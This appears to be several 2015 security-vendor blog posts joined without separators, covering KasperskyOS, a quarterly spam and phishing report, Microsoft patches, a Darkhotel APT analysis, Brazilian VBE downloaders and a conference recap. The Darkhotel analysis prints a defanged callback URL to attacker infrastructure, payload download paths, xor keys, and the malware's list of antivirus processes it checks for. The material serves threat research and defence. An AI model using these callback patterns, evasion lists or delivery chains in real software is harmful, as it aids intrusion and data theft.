After the publication of our article on car hacking we received a number of questions regarding KasperskyOS. People who wrote to us made the valid point that there are several good and reliable operating systems on the market, designed, among other purposes, for the automotive industry. The main argument used to demonstrate the technological superiority of competing solutions was that the principle of security domain isolation is not a new idea and many of the existing systems that are currently in use have numerous additional security features based on the current needs, such as implementations of cryptographic protocols, network filters and protection against network attacks. Some of these systems are even certified to meet various security standards!
All these additional features (including certification) are of course important, but is it this functionality that makes an operating system reliable and secure? To answer this question, we first need to answer another: what is a secure OS? From our viewpoint, a secure operating system should guarantee secure or trusted execution of components that are not secure (programs).
Our concept has two very important aspects. One is obvious: we do not trust third-party software and consider it insecure and unreliable by definition. The other, not-so-obvious aspect: we should trust the operating system and regard kernel functionality as trusted. To increase the level of trust (after all, gentlemen do not always believe each other’s word), the kernel should undergo formal and mathematical verification (the subject of verification would merit a large research paper of its own).
Taking this paradigm as a starting point, we did not just implement a secure architecture based on a trusted kernel, but learned from existing secure OS implementations, as well. The fundamental principles, such as security domain separation and a microkernel are only half the story. Studying other systems and their limitations helps not only to avoid known problems but also to find new ways to implement security properties. As a result, we have developed an OS that, on the one hand, is similar in its operating principles to other operating systems but, on the other hand, has features which help to overcome known limitations and improve the security characteristics of the system on which the OS is running.
As an example of such improvement, I would like to mention interprocess communication (IPC) typification. This technology, the idea of which might seem quite obvious, provides us with low-level control of the data sent in application calls, giving security policies a granularity of control that has never been implemented at this level. Another feature is combining different types of security policies, such as Flow Control and Type Enforcement, in one system. The resulting policy is a mix of stateful and stateless policies, offering the best of both worlds. Naturally, the possibilities of combining policies are not limited to these two types. No commercial operating system can boast this flexibility. This functionality provides tight control of all interprocess communication, which is based not only on the knowledge of the subject and object of communication (who requests and from whom) but also on the knowledge of the high-level context of communication (what is requested, when and what data is transferred).
Other KasperskyOS features include a flexible language for defining security policies and a policy verification system, which makes both creating and debugging policies significantly easier. There are many other things, as well. The uniqueness of our work is supported by US and Russian patents.
As a result, we believe we have developed an operating system which implements the principle of trusted execution of untrusted applications. This was achieved, among other things, by using the principle of security domain separation and control of interprocess communication that is tight and flexible at the same time. This means that in the OS, modules can only interact by following a strictly defined protocol, enabling them to call only allowed functions in a strictly defined sequence. For customers, this means that even if there is a vulnerability in some module that can be exploited by a hacker (and we admit that this may be the case), the OS works in such a way that the hacker will only be able to gain control of the vulnerable module and will not be able to interfere with the operation of other modules, because all communications are controlled.
An operating system can be compared to a shield. All additional built-in security capabilities, including firewalls, secure data transfer protocols, even certification, are rivets on the shield. They certainly add reliability to the whole thing, but they do not define the overall level of protection. What is more important is the architecture, the principles underlying the OS. This determines whether the shield will be made of paper, plywood or steel. Many operating systems have great rivets – but what kind of shield are they attached to?
We have already analyzed the situation with regard to the considerable increase in the number of new domain zones as well as mass generation of spammer domains in these zones, specifically those designed to send out illegitimate mass mailings. The further analysis of spam mailings shows that spammers rely not only on a huge number of new domains which they can change even within one thematic mass mailing, but also on the ways they are implemented in the text. For example, in Q1 we registered various cases of “noising” domains in links used to go to spam resources, as well as cases of code obfuscation in the HTML structure of the messages in the mass mailing.
In many mass mailing, spammers used IP addresses of sites, instead of domain names, in links to advertising resources. However they provided modified rather than direct IP addresses, representing them using the octal or hexadecimal numerical system, adding an arbitrary number of zeros to the beginning of the address. This did not change the IP address, but increased the number of possible variants of its representation (variations within one mass mailing); which, as spammers hoped, would help deceive the spam filter. Such alternative methods of representing IP addresses were used by spammers both in direct links and in “noised” redirects.
Spammers also used noised domains. For example, they represented a domain name using both upper and lower case characters (NEEDHosT.niNjA), as well as using several different codes in the HTML structure of the message. They attempted to hide their domains by changing one of the characters in the name of the domain zone for the same from the other code or similar to it. So, for example, it might look like this – domainname.com , domainname.cⓞ
Spammers often applied several methods of noising in one email: they used both the alternative representation of the IP address or domain distortion, as well as the traditional use of meaningless “junk” text in the body of the message, in order to completely conceal the spam theme of the message.World events in “Nigerian” spam
In the second quarter of 2015, “Nigerian” letters exploited the themes of the earthquake in Nepal, the presidential election in Nigeria and the Olympics in Rio de Janeiro. Tragic events widely covered in the world media are usually exploited by fraudsters to trick users, and their stories hardly change.
In the email written on behalf of a lawyer whose client died in Nepal, the scammers asked the recipient to play the role of the victim’s relative and help in receiving their inheritance, in return for financial remuneration. In the other mass mailings, the fraudsters distributed emails in the name of various organizations asking to help the earthquake victims. For example, “a representative of the Red Cross” asked the recipient to assist in accommodating a family of refugees who had decided to move to another country and invest their funds there.
Generally, the addresses of those who send “Nigerian” letters were registered on free e-mail services, even if the author of the email was a representative of an organization, as in the above case. However, some tricky fraudsters tried to make the name and the address of the sender look more legitimate. They sent out fake messages asking the recipients to make a voluntary donation to help the victims of the earthquake in Nepal.
“Nigerians” could not let political events go unnoticed. In one of the mass mailings, the fraudsters tried to lure the recipient with the sum of $2 million, which the newly elected President of Nigeria was allegedly ready to send to the user as compensation for the fraud committed by the citizens of his country.
The next Olympic Games in Brazil will not be held until 2016, but we are already registering fraudulent notifications of lottery wins dedicated to this popular sporting event. Interestingly, a large number of emails of this type was sent out in the run-up to the World Cup, while the Olympics were not mentioned. The content of the messages is standard: the lottery was held by the official organization, the recipient’s address was randomly selected out of millions of email addresses, to receive the win it is necessary to respond to the email and provide the specified personal information.
Noticeably, emails containing a short text in the body of the message, with detailed information provided in an attached PDF or DOC file, are gaining popularity with spammers. This may be because an email with a short text has more chance of passing through a spam filter as legitimate. Emails with attached files are especially dangerous because a user is likely to open the attachment to learn about the the content, which can result in malware infection.The Google search algorithm update
Yet another event exploited in spam in the second quarter of 2015 was the release of regular update to the Google search algorithm. This changed the mobile web search results so that the sites adapted for mobile phones were displayed on top positions.
This news resulted in a significant increase in the amount of spam relating to SEO (search engine optimization) and promotion of sites. Spammers sent out offers advertising the creation of sites of any complexity and purpose, as well as services to attract new customers. They emphasized the necessity to bring the site up-to-date by using the latest features of a popular search engine. Those site owners who still had doubts were threatened with ending up as the last pages in Google search results and the resulting loss of potential customers.Statistics Proportion of spam in email traffic
Proportion of spam in email traffic, January – June 2015
The worldwide decline in the share of spam in email traffic since the beginning of the year has almost stopped. In the second quarter of 2015 it stabilized, fluctuating between 53.5% in April and 53.23% in June.
Proportion of spam in email traffic in Russia, January – June 2015
The situation with spam in Russia is almost the same as for worldwide email traffic. During the second quarter, the share of spam traffic decreased by approximately 1 percentage point per month. Thus, the maximum quantity of spam emails in Q2 was sent in April (59.32%), while the minimum amount was distributed in June (57.47%)Spam sources by country
Countries that were sources of spam, Q2 2015
In the second quarter of 2015 the USA (14.59%) and Russia (7.82%) remained the biggest sources of spam. China came third with 7.14% of the world’s spam, compared to 3.23% in the previous quarter. It was followed by Vietnam (5.04% compared to 4.82% in Q1), Germany (4.13% compared to 4.39% in Q1) and Ukraine (3.90% compared to 5.56% in Q1).Spam email size
Spam email size distribution, Q1 2015 and Q2 2015
The distribution of spam emails by size saw little change from the previous quarter. The leaders were very small emails of up to 2 KB (65.38%), although the proportion of such emails has gradually decreased (it accounted for 73.99% in Q1). The share of emails sized 20-50 KB grew by 4.81 percentage points and reached 8.80%, while the percentage of emails in the size range of 2 KB-5 KB (17.16%), 5-10 KB (3.32%) and 10-20 KB (2.94%) increased slightly – by about 1 percentage point each.Malicious email attachments
Top 10 malicious programs sent by email, Q2 2015
The notorious Trojan-Spy.HTML.Fraud.gen topped the rating. As we have written before, this program is a fake HTML page which is sent via email, imitating an important notification from a large commercial bank, an online store, a software developer, etc. This threat appears as an HTML phishing website where a user has to enter his personal data which is then forwarded to cybercriminals.
Second and third positions are occupied by Trojan-Downloader.HTML.Agent.aax and Trojan-Downloader.HTML.Meta.as. Both are HTML pages which, when opened by users, redirect them to a rigged site. There, a victim is usually faced with a phishing page or is offered a download – Binbot, a binary option trading bot. The two malicious programs spread via email attachments and the only difference between them is the link which redirects users to rigged sites.
Trojan.Win32.Fsysna.brtr rounds off the Top3. It is just a common spam bot which redirects spam from the command center to the mail server on behalf of the infected machine.
Fourth is Trojan-Banker.Win32.ChePro.ink. This downloader, which was as low as sixth position in last year’s ranking, is a CPL applet (a Control Panel component) that downloads Trojans designed to steal confidential financial information. Most malicious programs of this type are aimed at Brazilian and Portuguese banks.
It is followed by Trojan-PSW.Win32.Fareit.auqm. Fareit Trojans steal browser cookies and passwords from FTP clients and email programs and then send the data to a remote server run by the fraudsters.
Seventh and eight places are occupied by downloaders from the Upatre family – Trojan-Downloader.Win32.Upatre.fbq and Trojan-Downloader.Win32.Upatre.fca, respectively, which are usually disguised as PDF or RTF documents. Their main task is to download, unpack and run additional applications.
Exploit.MSWord.CVE-2014-1761.k. is tenth in the Q2 rating of the most popular malicious programs sent by email. It is a Word document containing an exploit which uses an appropriate vulnerability to download to the victim computer other malicious programs designed to steal user personal data.Malware families
If popular malware families, rather than specific malicious programs, are ranked, Upatre heads the Q2 rating. Malware from the Upatre family downloads the Dyre (aka Dyreza, Dyzap) Trojan banker. The list of financial organizations attacked by this banker depends on the configuration file which is loaded from the command center.
The MSWord.Agent family is gaining popularity, although in Q1 it only occupied third position in the Top 10. These malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA), which runs on opening the document. It downloads and runs other malware, such as malicious programs from the Andromeda family.
In Q2 2015, ZeuS/Zbot re-entered the Top 3. The members of this family are designed to carry out attacks on servers and users’ computers and also for capturing data. Although ZeuS/Zbot is capable of carrying out various harmful actions, it is most often used to steal banking information. It can also install CryptoLocker – a malicious program that extorts money to decrypt the data that is has encrypted.Countries targeted by malicious mailshots
Distribution of email antivirus verdicts by country, Q2 2015
In the second quarter of 2015, there were major changes in the Top 3 countries most often targeted by mailshots. Germany (19.59%), which was only fourth in Q1, topped this quarter’s rating: every fifth antivirus detection was registered on the territory of this country. Great Britain, which headed the rating in Q1 2015, moved down to second position (6.31%). Brazil settled in third (6.04%).
The USA (5.03%), which was traditionally the country most often targeted by malicious mailshots, was in fourth place.
Of note is the fact that Russia (4.74%), which came only 10th in the previous quarter, climbed to fifth position in Q2 2015.Special features of malicious spam
In the Q2 spam traffic we continued to register malicious emails with macro viruses, although the peak of distribution for these fell in the previous quarter. Although their number decreased, they still posed a serious threat: the macros we found belonged to the category of Trojan downloaders and were designed to download other malicious programs. Fraudsters trying to convince the recipient of the legitimacy of the email masked their messages as business correspondence and passed malicious attachments off as financial documents or orders.
In some emails the attackers specified the sender’s contact details, inserted logos to make the email look official and took the email address indicated in the email from the “From” field. This made the fraudulent email look even more credible for the recipient.
In Q2 2015, we also came across emails imitating official messages from real companies, and the attackers matched the content of the message to the area of the company’s activity. For example, the emails in one of the mass mailings notified the user about the alleged text message sent by the company providing telecommunications services. The recipient was told they could read it by opening the Microsoft Word attachment, but in fact the message contained Trojan-Downloader.VBS.Agent.amj.
Yet another trick which remained popular with cybercriminals who specialize in sending out malicious spam was masking messages s notifications of receipt of faxes or scans of various documents. These fake notifications are written mainly in English or German, and the attachments imitating the files with faxes or scans contain different types of malware: Trojan.Upatre, Trojan.Downloader and HawkEyePHPLogger. The text in the body of such emails could be brief or, by contrast, contain detailed information about the received document
In September 2014, we registered a malicious mass mailing with an attachment that is not typical for spam – an archive in ARJ format. In 2015, fraudsters continue to use non-conventional archives to spread malware: April’s and May’s spam traffic distributed attached archives withCAB and ACE extensions, which are not common for today’s spam. The archives contained Trojan Trojan-Downloader.Win32.Cabby and HawkEye Keylogger. Unlike such popular spam extensions as ZIP and RAR, the CAB and ACE attachments may not always be recognized by users and thus cause less suspicion.
In Q2 2015, scammers distributed attached malicious ZIP and APK files within the framework of one mass mailing. If ZIP files are found in the majority of spam messages, APK files are relatively rare because they are archived executable application files for Android. The ZIP archives contained the Upatre family Trojan, while the file Check_Updatesj.apk was detected as the encryption Trojan SLocker for Android: when run, it encrypts images, documents and video files stored on the device. After that, the message is displayed to the user asking him to pay for decrypting the files. In sending malware in attached malicious ZIP and APK files, within the framework of one mass mailing, the scammers may have thought that they could trap not only PC users but the owners of Android-based smartphones and tablets working with e-mail from these devices.
In Q2 2015, the Anti-Phishing system was triggered 30,807,071 times on computers of Kaspersky Lab users. 509,905 masks of phishing URLs were added to the Kaspersky Lab databases over this period.
For several quarters in a row, the largest percentage of users affected by phishing attacks was in Brazil, although in Q2 2015 the number fell by half compared to the previous quarter. The same thing happened to the phishing numbers in many other countries.
Geography of phishing attacks*, Q2 2015
* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country
Top 10 countries by percentage of users attacked:Country % of users 1 Brazil 9.74% 2 India 8.3% 3 China 7.23% 4 Russia 6.78% 5 France 6.54% 6 Japan 5.93% 7 Malaysia 5.92% 8 Poland 5.81% 9 Kazakhstan 5.79% 10 UАE 5.75% Organisations under attack
The statistics on phishing attack targets are based on the heuristic component of the Anti-Phishing system being triggered. The heuristic component of Anti-Phishing is triggered when the user follows a link to a phishing page information on which is not yet included in Kaspersky Lab databases, regardless of the way in which the page was reached – as a result of clicking on a link in a phishing email, a message on a social network or, for example, as a result of a malicious program’s operation. When the component is triggered, it displays a banner in the browser, warning the user of a possible threat.
In the second quarter of 2015, the “Global Internet portals” category topped the rating of organizations attacked by phishers – its share increased by 2.78 percentage points from the previous quarter and accounted for 42.35%. The percentage of the “IMS” category (4.05%) also grew slightly (+0.13 percentage points) while the other categories showed a decline: “Social networking sites” lost 2.6 percentage points, “Banks” – 5.56 percentage points, “Online stores” – 1.56 percentage points, “E-pay systems” – 2.84 peercentage points, “Telephone and Internet service providers” – 1.33 percentage points, “Online games” – 0.78 percentage points.
Distribution of organizations affected by phishing attacks, by category, Q2 2015
Instant messaging services are popular with fraudsters for many reasons. For example, cybercriminals often use stolen accounts for sending out phishing emails or links to malicious programs to the email addresses registered in the victim’s list of contacts, distributing spam, extorting money and other fraudulent schemes.
Distribution of phishing attacks on IMS, Q2 2015
Most of the Anti-Phishing system activations in this category fall on the popular Chinese instant messaging service QQ, supported by the Tencent telecommunications company.
Phishing pages imitating QQ personal account login pages
Second comes Skype (8.88%) owned by Microsoft. Its share is incomparably smaller than that of the leader in this category.
Phishing page inviting Skype users to verify their personal accountTop 3 organizations attacked
As we have written in our previous reports, the biggest part of non-spear phishing attacks targets the users of a small group of popular companies with many customers around the world. In this way fraudsters are trying to increase their chances of hitting the target by organizing yet another phishing attack.
The Top 3 organizations most often attacked by phishers accounts for 45.14% of all detected phishing links.Organization % of all detected phishing links 1 Yahoo! 29.03% 2 Facebook 10.44% 3 Google 5.67%
The top three organizations targeted by phishers remained unchanged from the previous quarter. It includes Yahoo! (+23.82 percentage points), Facebook (-0.53 percentage points) and Google (-2.44 percentage points). A considerable increase in the proportion of detections of fake Yahoo! pages became possible due to the general decrease in the number of detections; in terms of numbers, the quantity of fake Yahoo! page detections increased only insignificantly.
In Q2 2015, we came across a huge number of phishing pages which imitated the publication of a Facebook page containing an intimate YouTube video. When trying to play the video, a malicious program was downloaded to the victim’s computer.
Fake Facebook pages distributing malicious filesConclusion
In Q2 2015, the percentage of spam in email traffic accounted for 53.4%, a drop of 5.8 percentage points from the previous quarter.
In the second quarter the stories contained in “Nigerian” letters were based on real events: the upcoming Olympic Games in Rio de Janeiro, the presidential elections in Nigeria, as well as the earthquake in Nepal. Fraudsters lured the recipients not only by promising rewards or compensation, but by mentioning lottery wins and asking for a donation for the victims of the earthquake in Nepal.
The increase in the amount of SEO spam was caused by the release of the Google Search algorithm update. The purpose of the update was to raise the sites adapted to mobile phones to a higher position in mobile search results.
In the second quarter of 2015 the top three sources of spam were the USA (14.59%), Russia (7.82%) and China (7.14%).
Trojan-Spy.HTML.Fraud.gen topped the rating of malicious programs sent by email. If popular malware families, rather than specific malicious programs, are ranked, Upatre headed the Q2 rating. Germany (19.59%) was the quarter’s leader as the country most often targeted by mailshots.
Fraudsters continued to pass off attached malicious files as faxes and scans, Flash Player updates and business correspondence. They also continued to send out macro viruses in Word and Excel documents and they used CAB and ACE archives and APK files which are not typical for spam.
In Q2 2015, the Anti-Phishing system was triggered more than 30 million times on computers of Kaspersky Lab users. The largest percentage of users affected by phishing attacks was in Brazil, although the number fell by half from the previous quarter.
Microsoft releases a new batch of fourteen security updates patching over fifty vulnerabilities today, with one of them known to be abused in targeted attacks. A large number of the vulnerabilities were reported by researchers from Google and their Project Zero, and HP’s Zero Day initiative. Meanwhile, a reflective discussion about the value of these offensive teams is laid out on offsec mailing lists.
Currently being exploited in-the-wild, MS15-085 “Vulnerability in Mount Manager Could Allow Elevation of Privilege”, enables an attacker to write out an executable to disk and run it from usb disk insertion. Exploitation is in use as a part of limited targeted attacks. Update installation and maintenance seems to be a large order here, as Microsoft includes a unique recommendation with it: “If you install a language pack after you install this update, you must reinstall this update.” Not only is “Mountmgr.sys” listed a few hundred times in this related knowledge base article, but over a hundred other files are touched with this larger update. And not only is Microsoft shipping code to close up the vulnerability, they are also shipping a new event for the event log, to identify related exploit attempts, “As part of the update, we are also shipping an event log to help defenders detect attempts to use this vulnerability on their systems”. Event ID 100: MountMgr “CVE-2015-1769″ will be logged by Windows for reference.
The new Edge web browser maintains three “memory corruption” vulnerabilities. Typically, when these arise in Microsoft’s web browsers, the flaws have been use-after-free problems. These memory corruption issues surprisingly enable remote code execution on Windows 10:
and one ASLR bypass issue. While the code base is smaller, faster, and newer than IE, these issues continue to crop up in their newest code.
More on Microsoft’s August 2015 Bulletins can be found here, please update your system asap.
Darkhotel APT attacks dated 2014 and earlier are characterized by the misuse of stolen certificates, the deployment of .hta files with multiple techniques, and the use of unusual methods like the infiltration of hotel Wi-Fi to place backdoors in targets’ systems. In 2015, many of these techniques and activities remain in use. However, in addition to new variants of malicious .hta, we find new victims, .rar attachments with RTLO spearphishing, and the deployment of a 0day from Hacking Team.
The Darkhotel APT continues to spearphish targets around the world, with a wider geographic reach than its previous botnet buildout and hotel Wi-Fi attacks. Some of the targets are diplomatic or have strategic commercial interests.
The location of Darkhotel’s targets and victims in 2015:
- North Korea
- South Korea
2015 Darkhotel .hta and backdoor-related, exploit-related and c2 sites:
2015 spearphishing incident attachment name subset:
- schedule(6.1~6).rar -> schedule(6.1~6)_?gpj.scr
- schedule(2.11~16).rar -> schedule(2.11~16)_?gpj.scr
- congratulation.rar -> congratulation_?gpj.scr
- letter.rar -> letter_?gpj.scr
Whether the infection is achieved through spearphishing, physical access to a system or the Hacking Team Flash 0day, there frequently seems to be a common method for a newly-infected system to communicate with Darkhotel’s c2:
It is interesting that this particular group has for years now deployed backdoor and downloader code in the form of .hta files. In 2010, we observed it re-purposing articles on North Korea by the US think-tank, Brookings Institute, in order to attack North Korean-related targets with malicious code buried in .hta files. It also emailed links to its malicious .hta files to North Korean tourist groups, economists with an interest in North Korea, and more. It’s somewhat strange to see such heavy reliance on older Windows-specific technology like HTML applications, introduced by Microsoft in 1999.
From the recent sendspace.servermsys.com/downloader.hta:
After execution and escaping a couple of variables, the .hta uses ancient Adodb.stream components in order to write out a string xor’d with 0x3d as an executable file and runs it.
This code results in the execution of “internet_explorer_Smart_recovery.exe” 054471f7e168e016c565412227acfe7f, and a hidden browser window phoning back to its c2. In this case, it seems that Darkhotel operators are checking as to whether or not the victim’s default browser is Internet Explorer, as all versions of IE return the value “0” and other browsers leave “appMinorVersion” undefined. This data collection seems somewhat odd, because .hta files are supported and run by mshta.exe on Windows systems only, still delivered with Windows 8. Perhaps it is an artefact from early development of the code. Here is a recent version:
“hxxp://sendspace.servermsys.com/readme.php?type=execution&result=created_and_executed&info=” + navigator.appMinorVersion + “
The “internet_explorer_Smart_recovery.exe” file is a simple obfuscated downloader. A series of xor 0x28 loops decrypt the contents of a self-deletion batch file, which is then written to disk and executed. Later in the execution, a more complex rc4 loop decrypts the download url and other strings and imports.
When finished, this url string decryption and connectback looks like
http://sendspace.servermsys.com/wnctprx. The file is downloaded (b1f56a54309147b07dda54623fecbb89) to “.tmp” file in %temp%, executed, and the downloader exits. This larger file is a backdoor/downloader that includes ssh functionality, and drops its keys to disk for ssh interaction. We find older Darkhotel information stealers dropped and run on the system by these downloaders.
The Darkhotel APT will relentlessly spearphish specific targets in order to successfully compromise systems. Some targets are spearphished repeatedly with much the same social-engineering schemes. For example, the attachment “schedule(2.11~16).rar” could be sent on February 10th, with Darkhotel returning to the same targets in late May for a second attempt with attachment “schedule(6.1~6).rar”.
It consistently archives RTLO .scr executable files with in .rar archives, in order to appear to the target as innocuous .jpg files. These executable files are lite droppers, maintaining these decoy jpeg files, and code to create an lnk downloader.
When the target attempts to open what they think is a jpg image file, the executable code runs and drops a jpg image to disk, then opens it with mspaint.exe in the background. This “congratulations” document is in Korean, revealing a likely characteristic of the intended target.
While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. This technique is also used by other APTs as persistence mechanisms, as documented by our Mandiant colleagues. The 64kb lnk file is downloader code:
When this lnk file is executed, it begins an AJAX-based download process for the “unzip.js” file (a07124b65a76ee7d721d746fd8047066) on openofficev.info. This is another wscript file implementing AJAX to download and execute a relatively large compiled executable:
This executable code is saved to %temp%\csrtsrm.exe and executed there. It is a relatively large executable (~1.2 mb) that injects malicious code and spawns remote threads into legitimate processes.Stolen certificates and evasion
The group appears to maintain a stockpile of stolen certificates and deploys their downloaders and the backdoors signed with them. Some of the more recent revoked certificates include ones that belong to Xuchang Hongguang Technology Co. Ltd.
Darkhotel now tends to hide its code behind layers of encryption. It is likely that it has slowly adapted to attacking better-defended environments and prefers not to burn these stolen digital certificates. In previous attacks it would simply have taken advantage of a long list of weakly implemented, broken certificates.
Not only are its obfuscation techniques becoming stronger, but its anti-detection technology list is growing. For example, this signed downloader (d896ebfc819741e0a97c651de1d15fec) decrypts a set of anti-malware strings in stages to identify defensive technologies on a newly-infected system, and then opens each process, looking for a matching image name:
c:\avast! sandbox\WINDOWS\system32\kernel32.dll – Avast!
avp.exe – Kaspersky Lab
mcagent.exe;mcuicnt.exe – Intel/Mcafee
bdagent.exe – BitDefender
ravmon.exe,ravmond.exe – Beijing Rising
360tray.exe,360sd.exe,360rp.exe,exeMgr.exe – Qihoo 360
ayagent.aye,avguard.;avgntsd.exe – Avira Antivirus
ccsvchst.exe,nis.exe – Symantec Norton
avgui.exe,avgidsagent.exe,avastui.exe,avastsvc.exe – Avast!
msseces.exe;msmpeng.exe – Microsoft Security Essentials and Microsoft Anti-Malware Service
AVK.exe;AVKTray.exe – G-Data
avas.exe – TrustPort AV
tptray.exe – Toshiba utility
fsma32.exe;fsorsp.exe – F-Secure
econser.exe;escanmon.exe – Microworld Technologies eScan
SrvLoad.exe;PSHost.exe – Panda Software
egui.exe;ekrn.exe – ESET Smart Security
pctsSvc.exe;pctsGui.exe – PC Tools Spyware Doctor
casc.exe;UmxEngine.exe – CA Security Center
cmdagent.exe;cfp.exe – Comodo
KVSrvXP.exe;KVMonXP.exe – Jiangmin Antivirus
nsesvc.exe;CClaw.exe – Norman
V3Svc.exe – Ahnlab
guardxup. – IKARUS
FProtTray. – F-Prot
op_mon – Agnitum Outpost
vba332ldr.;dwengine. – DrWeb
Even the identifying information that the backdoor seeks from a system is not decrypted until runtime. Like the “information-stealer” component documented in our previous Darkhotel technical report, this component seeks to steal a set of data with which to identify the infected system. Much of the information is collected with the same set of calls, i.e. kernel32.GetDefaultSystemLangID, kernel32.GetVersion, and kernel32.GetSystemInfo:
- Default system codepage
- Network adapter information
- Processor architecture
- Hostname and IP address
- Windows OS and Service Pack versions
Essentially, much of this information-stealer code is the same as that observed in previous attacks.Tisone360.com, Visits, and Hacking Team Flash 0day
The tisone360.com site was especially interesting to us. In April 2015, Darkhotel was email-phishing with links to earlier (cve-2014) Flash exploits, and then, at the beginning of July, it began to distribute what is reported to be a leaked Hacking Team Flash 0day.
It looks like the Darkhotel APT may have been using the leaked HackingTeam Flash 0day to target specific systems. We can pivot from “tisone360.com” to identify some of this activity. The site was up and active as late as 22 July, 2015. However, this looks to be a small part of its activity. In addition to the icon.swf HT 0day (214709aa7c5e4e8b60759a175737bb2b), it looks as though the “tisone360.com” site was delivering a Flash CVE-2014-0497 exploit in April. We reported the related vulnerability to Adobe in January 2014, when it was being used by the Darkhotel APT.
Recently, the Darkhotel APT has maintained multiple working directories on this site.
It is the ims2 directory that is the most active. It contains a set of backdoors and exploits. The most interesting of these is the reported Hacking Team Flash 0day, icon.swf. In the days following the public mention of this server, the crew slowly tightened down open access to /ims2/. Either way, the contents continued to be actively used.
icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg (42a837c4433ae6bd7490baec8aeb5091)
-> %temp%\RealTemp.exe (61cc019c3141281073181c4ef1f4e524)
After icon.jpg is downloaded by the flash exploit, it is decoded with a multi-byte xor key 0xb369195a02. It then downloads further components.
It’s interesting to note that the group appears to be altering the compilation and linker timestamps of its executable code to dates in 2013. We see this across multiple samples deployed and observed for the first time in mid-2015, including the icon.jpg downloader.
A log of visits to the site directory records that the directory was set up on July 8th. A handful of visits to a specific url on the server from five systems based in the following locations were recorded on the 8th and 9th. Several of these are likely to be Darkhotel APT targets:
- South Korea
- China (likely to be research)
However, one of those systems hammered the site on the 9th, visiting almost 12,000 times in 30 minutes. This volume of traffic is likely to represent a noisy scanning research attempt and not someone DoS’ing the site:
Recorded site visits following the 9th are likely to be unreliable and may be more researchers, responding to the growing notoriety of the site following the public reports on the 9th. Many of these approximately 50 visits come from a subset of the above systems and are repeated multiple times. Visits from the following locations occurred on or after the 10th:
- Germany (likely to be research)
- Ukraine (likely to be research)
- Amazon Web Services, multiple locations (likely to be research)
- Googlebot, multiple locations
- Ireland (likely to be research)
- France (likely to be research)
- Czech Republic
The Darkhotel group tends to stick with what works. For example, for years we saw repeated use of spearphishing targets directly with .hta files. Now, as with the tisone360.com site above, we have seen repeated use in 2015 of a creative chain of delivery sets.
downloader -> hta checkin -> info stealer -> more compiled components.
dropper -> wsh script -> wsh script -> info stealer -> more compiled components
spearphish -> dropper -> hta checkin -> downloader -> info stealer
While a chain of delivery that includes obfuscated scripts within .hta files occurred as far back as 2011, the volume appears to have picked up in 2014 and now 2015.
The group is now more vigilant in maintaining its sites, tightening up configuration and response content. Right now, its c2 responds with anti-hero images of “Drinky Crow” from the alt Maakies cartoon:
Other Darkhotel c2s tend to blend in with random sites on the web when incorrect or missing pages are visited. They are ripping images either from FOTOLIA or articles on artisanal ice cream makers here:
39562e410bc3fb5a30aca8162b20bdd0 (first seen late 2014, used into 2015)
e85e0365b6f77cc2e9862f987b152a89 (first seen late 2014, used into 2015)
CVE-2014-0497 – A 0-day Vulnerability
Hacking Team Flash Zero-Day Tied To Attacks In Korea and Japan… on July 1
The Darkhotel APT
Old tricks never die, and bad guys know that. We recently saw a big wave of malicious VBE files targeting Brazilian users, distributed via email messages. Most of the files are downloaders which, after they are executed, try to install a series of badness that goes from traditional banking Trojans to RATs to Boleto malware.
The attack started with messages like the one below, with a .ZIP file attached to the message. Some messages show only links to download the VBE file directly, using a variety of topics, such as the release of Windows 10. As you can see, the file is very small (less than 1KB) but inside is where the badness lives:
This message was sent to “Malicioso”, a mailbox where our Latin American users can send suspicious content
It’s interesting to see how mail servers still don’t block this kind of file attached to messages – all the bad guys need to do is to put the malicious file inside a ZIP or RAR and magically the message will arrive in the user’s mailbox:
Yes, Outlook.com still accept VBE/VBS files inside a ZIP
Not surprisingly the VBE file attached to the ZIP file is encoded:
Bad guys are using all kinds of encoding, in an effort to avoid detection by AV products – although most are using simple Base64 provided by Motobit software. Some are also using a commercial encoding solution, even using a demo copy:
After decoding the file we can see their real intention; this one downloads and installs Boleto malware, which is very typical for Brazil:
These malware families are detected by our product using two verdicts. Recently there has been a big increase in both in Brazil, as illustrated by the numbers for Trojan-Downloader.VBS.Agent:
And there were almost 12,000 detection of Trojan-Downloader.VBS.Banload in just one day:
Looking at our stats worldwide, we can see that Brazil, Portugal and Spain are the most attacked countries by the VBS.Banload family this month. Not surprisingly, Brazil always leads all the rankings regarding Banking Trojan infections, even where they use a very old technique. The reason why the bad guys decide to use this is because they are still effective for some users.
Our users are protected against this kind of attack: our heuristic detection blocks most of them. Here are some MD5s of the files we detect: http://pastebin.com/Qpb6v6PQ
Blackhat and Defcon 2015 are being held in Las Vegas this year in the Mandalay Bay and Paris hotels, with 9,000 people in Blackhat attendance and more at Defcon. While attending Blackhat is far more expensive, you are almost assured a spot at the talks you intend on attending. At Defcon, it appears that most attendees have been assured to wait in line to miss most of the talks they are interested in, with other folks yelling about it in the halls. The Defcon organizers chose a new venue for the conference this year, and it needs to be fixed.
Blackhat had another fantastic lineup with some mind-blowing content, as in previous years. A wide range of topics were presented this year and we found several very interesting. You already may find tools on github and papers and slides for many the presentations on blackhat.com. We can expect videos of these talks on youtube in the near future. The Defcon organizers will upload a torrent of the talks as they have done in previous years:
- four of the talks revolved around hypervisor implementations and related content, including strengths and weaknesses of current and upcoming Windows10 security architecture dependent on the hypervisor and system firmware. Pass-the-hash and golden and silver ticket defenses, Windows 10 Credential Guard and other services are all built on assumptions of a trusted boot
- industrial PLC code injection with STL SOCKS proxy code and STL SNMP scanner for full industrial network compromise, abusing internet facing PLCs
- unpatchable global vulnerabilities in the Globalstar GPS simplex satcom protocol, affecting military, SCADA networks, first response communications and transportation
- a new class of escalation of privilege x86 ring -2 vulnerabilities only fixed in 2013+ intel processors, leaving 100,000,000’s that cannot be fixed
Of course, the hallway track is often as valuable as attending the talks themselves.